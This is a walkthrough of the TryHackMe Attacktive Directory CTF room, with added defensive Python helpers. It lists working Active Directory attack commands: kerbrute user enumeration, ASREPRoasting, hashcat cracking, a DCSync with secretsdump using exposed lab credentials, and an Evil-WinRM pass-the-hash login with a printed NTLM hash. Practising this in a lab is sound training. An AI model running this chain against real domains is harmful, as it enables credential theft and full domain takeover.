Attacktive Directory THM — Walkthrough
I want to share this walkthrough of the TryHackMe Attacktive Directory CTF room. It could be helpful for beginners or anyone interested. I include some useful links so you can understand a little more about the steps inside the challenge and the way I solved it; if you have comments or observations I would like to read them 🙂.
Let's do it, happy hacking.
TryHackMe link: TryHackMe | Attacktive Directory ("99% of Corporate networks run off of AD. But can you exploit a vulnerable Domain Controller?")
Recommended Lectures/Resources
I added some links at the end of the walkthrough so you can get involved with the topics related to this challenge; if you are a total beginner I recommend you first take a look at those links.
[Task 1] Deploy the machine
99% of Corporate networks run off of AD. But can you exploit a vulnerable Domain Controller?
Learning objectives:
- Impacket
- Kerbrute
- AD Enumeration
- Kerberos
- Cracking Hashes
- Hashcat
- Privilege Escalation
[Task 2] Impacket Installation
After installing it, remember the Impacket path for later.
[Task 3] Enumerate the DC
Initial note:
Flags for each user account are available for submission. You can retrieve the flags for user accounts via RDP (Note: the login format is spookysec.local/User at the Windows login prompt) and Administrator via Evil-WinRM.
Basic enumeration tactics will yield a number of ports open. Using a popular enumeration tool that’s built on Linux 4 Windows will reveal some information, not a lot to work with however.
Q1 — How many ports are open under 10,000?
Discovering with NMAP
#useful command
$ nmap -oN open_ports.txt -n 10.10.71.93
# Nmap 7.80 scan initiated Tue Jun 30 20:41:59 2020 as: nmap -oN open_ports.txt -n 10.10.71.93
Nmap scan report for 10.10.71.93
Host is up (0.17s latency).
Not shown: 987 closed ports
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
3389/tcp open ms-wbt-server
# Nmap done at Tue Jun 30 20:42:18 2020 -- 1 IP address (1 host up) scanned in 19.14 seconds
Virtual Machine IP ADDRESS — 10.10.71.93
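As an added example (not part of the original walkthrough), a small Python parser for the nmap -oN output above: it counts the open ports below 10,000 for Q1 and checks whether the Kerberos/LDAP/SMB/Global Catalog combination marks the host as a domain controller. The scan text is embedded as a constructed copy of the output shown here; the function and constant names are my own.

```python
import re

# Constructed sample: the nmap -oN output reproduced in this walkthrough (target 10.10.71.93).
NMAP_OUTPUT = """\
# Nmap 7.80 scan initiated Tue Jun 30 20:41:59 2020 as: nmap -oN open_ports.txt -n 10.10.71.93
Nmap scan report for 10.10.71.93
Host is up (0.17s latency).
Not shown: 987 closed ports
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
3389/tcp open ms-wbt-server
# Nmap done at Tue Jun 30 20:42:18 2020 -- 1 IP address (1 host up) scanned in 19.14 seconds
"""

# One port line of -oN output: "<port>/<proto> <state> <service>" (whitespace separated).
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")

def parse_open_ports(text):
    """Return [(port, proto, service), ...] for every line whose state is 'open'."""
    found = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m and m.group(3) == "open":
            found.append((int(m.group(1)), m.group(2), m.group(4)))
    return found

def count_open_below(ports, limit=10000):
    """The room's first question: how many open ports are numbered below the limit."""
    return sum(1 for port, _, _ in ports if port < limit)

# Services that, seen together on one host, mark it as an Active Directory domain controller.
DC_MARKERS = {88: "Kerberos", 389: "LDAP", 445: "SMB", 3268: "Global Catalog"}

def domain_controller_evidence(ports):
    """Return the DC marker services that are open, in port order."""
    open_numbers = {port for port, _, _ in ports}
    return [name for port, name in sorted(DC_MARKERS.items()) if port in open_numbers]

def is_domain_controller(ports):
    """All four markers open means the host is almost certainly a DC."""
    return len(domain_controller_evidence(ports)) == len(DC_MARKERS)
```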
Q2 — What tool will allow us to enumerate port 139/445?
Port 139: SMB originally ran on top of NetBIOS using port 139. NetBIOS is an older transport layer that allows Windows computers to talk to each other on the same network.
Port 445: later versions of SMB (after Windows 2000) began to use port 445 on top of a TCP stack. Using TCP allows SMB to work over the internet.
SMB is a network communication protocol for providing shared access to files, printers, and serial ports between nodes on a network. It also provides an authenticated inter-process communication mechanism. Most usage of SMB involves computers running Microsoft Windows.
#useful command
$ nmap -sC -p 139,445 -sV 10.10.71.93
Tool used — enum4linux
Q3 — What is the NETBIOS-Domain name of the machine?
THM-AD
Q4 — What invalid TLD do people commonly use for their Active Directory Domain?
.local
[Task 4] Enumerate the DC pt 2
Introduction:
A whole host of other services are running, including Kerberos. Kerberos is a key authentication service within Active Directory. With this port open, we can use a tool called Kerbrute (by Ronnie Flathers @ropnop) to brute force discovery of users, passwords and even password spray!
Enumeration:
For this box, a modified User List and Password List will be used to cut down on time of enumeration of users and password hash cracking. It is NOT recommended to brute force credentials due to account lockout policies that we cannot enumerate on the domain controller.
Getting the THM box repo from the creator (Sq00ky)
Let's clone the repository to get Kerbrute and the users.txt and passwords.txt files.
Sq00ky/attacktive-directory-tools
$ git clone https://github.com/Sq00ky/attacktive-directory-tools.git
#make kerbrute executable
$ chmod u=rwx kerbrute
$ chmod +x kerbrute #useful command
$ ./kerbrute -h #shows the usage for kerbrute
Q1 — Which command within kerbrute will allow us to enumerate valid usernames?
Use the help menu to find the correct command.
#use
$ ./kerbrute -h
output (screenshot not reproduced here)
Q2 — What notable account is discovered?
Q3 — What is the other notable account discovered?
Let's try the command from question 1.
#how to properly use userenum
$ ./kerbrute userenum -h
#take a look at the flags
--dc
-d
-t
#formally write it
$ ./kerbrute userenum --dc 10.10.71.93 -d spookysec.local userlist.txt -t 100
#remember userlist.txt is the list given by the creator of the box
Accounts found (answers to the questions above)
[Task 5] Exploiting Kerberos
Introduction
After the enumeration of user accounts is finished, we can attempt to abuse a feature within Kerberos with an attack method called ASREPRoasting. ASREPRoasting occurs when a user account has the privilege "Does not require Pre-Authentication" set. This means that the account does not need to provide valid identification before requesting a Kerberos Ticket on the specified user account.
Exploitation
Impacket has a tool called “GetNPUsers.py” (located in Impacket/Examples/GetNPUsers.py) that will allow us to query ASReproastable accounts from the Key Distribution Center. The only thing that’s necessary to query accounts is a valid set of usernames which we enumerated previously via Kerbrute.
Q1 — We have two user accounts that we could potentially query a ticket from. Which user account can you query a ticket from with no password?
svc-admin
Q2 — Looking at the hashcat examples wiki page, what type of kerberos hash did we retrieve from the KDC?
Take a look at the hint and remember HASHCAT ;)
Q3 — What mode is the hash?
Q4 — Now crack the hash with the modified password list provided. What is the user account's password?
Answering Q#2,3,4
Remember the Impacket path and GetNPUsers.py from the previous reading? Time to use it.
$ GetNPUsers.py
#usage: how to use GetNPUsers.py
$ GetNPUsers.py -h
#execute the command
$ GetNPUsers.py -no-pass -dc-ip 10.10.71.93 spookysec.local/svc-admin
For later use I saved the output to a txt file.
Search the hashcat example hashes wiki page for the output format.
Cracking the HASH
→ I passed the output (hash) to a txt file and used that file to run hashcat against the password list.
#try first
$ hashcat --help
#then get into it
$ hashcat -m 18200 -a 0 hash.txt passwordlist.txt --force
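Added example, not from the room or the walkthrough author, covering the defender's side of the ASREPRoasting and cracking steps above: it builds the LDAP filter that lists enabled accounts carrying the "Does not require Pre-Authentication" flag (userAccountControl bit 0x400000), audits a constructed set of accounts, and parses a GetNPUsers.py-style hash line to pick the hashcat mode (18200 for etype 23, the mode used above). The account values and the hash line are constructed; no real ticket data is used.

```python
import re

# userAccountControl bit "Do not require Kerberos preauthentication" (UF_DONT_REQUIRE_PREAUTH).
DONT_REQ_PREAUTH = 0x400000
ACCOUNTDISABLE = 0x0002
# LDAP_MATCHING_RULE_BIT_AND: lets a filter test a single bit of userAccountControl server-side.
LDAP_BIT_AND = "1.2.840.113556.1.4.803"

def asrep_roastable_filter():
    """LDAP filter an auditor can run to list enabled accounts exposed to ASREPRoasting."""
    return ("(&(objectCategory=person)(objectClass=user)"
            f"(userAccountControl:{LDAP_BIT_AND}:={DONT_REQ_PREAUTH})"
            f"(!(userAccountControl:{LDAP_BIT_AND}:={ACCOUNTDISABLE})))")

def audit_preauth(accounts):
    """accounts: {sAMAccountName: userAccountControl}. Returns enabled accounts that skip preauth;
    disabled ones are excluded because the KDC refuses them a ticket anyway."""
    return sorted(name for name, uac in accounts.items()
                  if uac & DONT_REQ_PREAUTH and not uac & ACCOUNTDISABLE)

# Hash line as GetNPUsers.py prints it in hashcat format:
#   $krb5asrep$<etype>$<user>@<REALM>:<32 hex checksum>$<hex encrypted part>
ASREP_LINE = re.compile(
    r"^\$krb5asrep\$(\d+)\$([^@$:]+)@([^:$]+):([0-9a-f]{32})\$([0-9a-f]+)$", re.I)
# etype 23 (RC4-HMAC) is what hashcat mode 18200 cracks; AES replies need a different mode.
HASHCAT_MODES = {23: 18200}

def parse_asrep_line(line):
    """Split a dumped AS-REP line into its fields and pick the hashcat mode; None if malformed."""
    m = ASREP_LINE.match(line.strip())
    if not m:
        return None
    etype = int(m.group(1))
    return {"etype": etype, "user": m.group(2), "realm": m.group(3),
            "checksum": m.group(4).lower(), "hashcat_mode": HASHCAT_MODES.get(etype)}

# Constructed sample data (not from the box): UAC values and a fake AS-REP line with dummy hex.
SAMPLE_ACCOUNTS = {
    "Administrator": 0x200,                                   # NORMAL_ACCOUNT only
    "svc-admin": 0x200 | DONT_REQ_PREAUTH,                    # roastable
    "old-svc": 0x200 | DONT_REQ_PREAUTH | ACCOUNTDISABLE,     # flag set, but disabled
}
SAMPLE_LINE = "$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:" + "ab" * 16 + "$" + "cd" * 48
```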
[Task 6] Enumerate the DC pt 3
Note: my virtual machine changed its IP address, do not get confused.
Virtual Machine IP ADDRESS : 10.10.116.78
Enumeration:
With a user’s account credentials we now have significantly more access within the domain. We can now attempt to enumerate any shares that the domain controller may be giving out.
Q1 — Which utility can we use to map remote SMB shares?
Take a look at the hint ;)
Q2 — Which option will list shares?
Q3 — How many remote shares is the server listing?
Q4 — There is one particular share that we have access to that contains a txt file. Which share is it?
Answering Q#2,3,4
$ smbclient -L 10.10.116.78 -U 'svc-admin'
Q5 — What is the content of the file?
Q6 — Decoding the contents of the file, what is the full contents?
Let's try base64
$ base64 --decode --help
$ base64 --decode backup_credentials.txt
[Task 7] Elevating privileges
Note: my virtual machine changed its IP address again, do not get confused.
Virtual Machine IP ADDRESS : 10.10.63.2
Introduction:
Now that we have new user account credentials, we may have more privileges on the system than before. The username of the account “backup” gets us thinking. What is this the backup account to? Well, it is the backup account for the Domain Controller.
This account has a unique permission that allows all Active Directory changes to be synced with this user account. This includes password hashes.
Knowing this, we can use another tool within Impacket called “secretsdump.py”. This will allow us to retrieve all of the password hashes that this user account (that is synced with the domain controller) has to offer. Exploiting this, we will effectively have full control over the AD Domain.
Q1 — What method will allow us to dump NTDS.DIT?
Q2 — What is the administrator's NTLM hash?
secretsdump.py
$ secretsdump.py -h
$ impacket-secretsdump -just-dc backup:backup2517860@10.10.63.2
Useful links
Q3 — What method of attack could allow us to authenticate as the user without the password?
Pass the Hash Attack Tutorial | Lateral Movement using LanMan or NTLM hashes
Pass the Hash is a technique that enables an attacker (typically using Mimikatz) to leverage the LanMan or NTLM hashes…
Q4 — Using a tool called Evil-WinRM what option will allow us to use a hash?
[Task 8] Flags
Answering Q#1,2,3
Submit the flags for each user account. They can be located on each user’s desktop.
$ evil-winrm -i 10.10.63.2 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc
Congrats, you have made it :)